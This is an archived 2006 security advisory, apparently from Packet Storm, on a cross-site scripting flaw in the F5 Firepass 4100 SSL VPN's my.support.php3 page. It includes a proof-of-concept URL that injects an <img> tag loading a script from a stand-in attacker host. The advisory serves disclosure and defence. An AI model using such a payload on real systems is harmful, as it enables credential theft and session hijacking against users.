exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

F5Firepass4100.txt

F5Firepass4100.txt
Posted Mar 23, 2006
Authored by ILION Research Labs

5 Firepass 4100 SSL VPN v. 5.4.2 suffers from XSS in in my.support.php3. This allows an attacker to submit a crafted link to users of the vulnerable Web application in order to abuse their trust and steal their authentication credentials or hijack their sessions.

tags | advisory, web
SHA-256 | ff4fd9822a3a5c3918ff9217ff53b087caf92737953fcd30bb6f7094615f0e29

F5Firepass4100.txt

Change Mirror Download
Vulnerability class : Cross-Site Scripting
Discovery date : 2nd of February 2006
Remote : Yes
Local : No
Credit : ILION Research Labs, Geneva Switzerland
Vulnerable : F5 Firepass 4100 SSL VPN v. 5.4.2

A XSS (Cross-Site-Scripting) vulnerability has been uncovered in my.support.php3 called through a Web browser on the F5 Firepass 4100 SSL VPN.

This allows an attacker to submit a crafted link to users of the vulnerable Web application in order to abuse their trust and steal their authentication credentials or hijack their sessions.

Trust abuse can be complete since the SSL certificate can appear as vouching for the trustworthiness of the website while the page actually displayed is hosted on a malicious third-party server (this can be done by using the <iframe> tag of IE for example).

Proof-of-concept exploit :

https://www.vulnerable_server.com/my.support.php3?c=1&s=username</title><img
src=https://MALICIOUS_SERVER.COM/EXPLOIT.JS>&lang=en&charset=iso-8859-
1&uilangchar=en.iso-8859-1

where https://MALICIOUS_SERVER.COM/EXPLOIT.JS is a malicious JavaScript interpreted by the victim's navigator.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close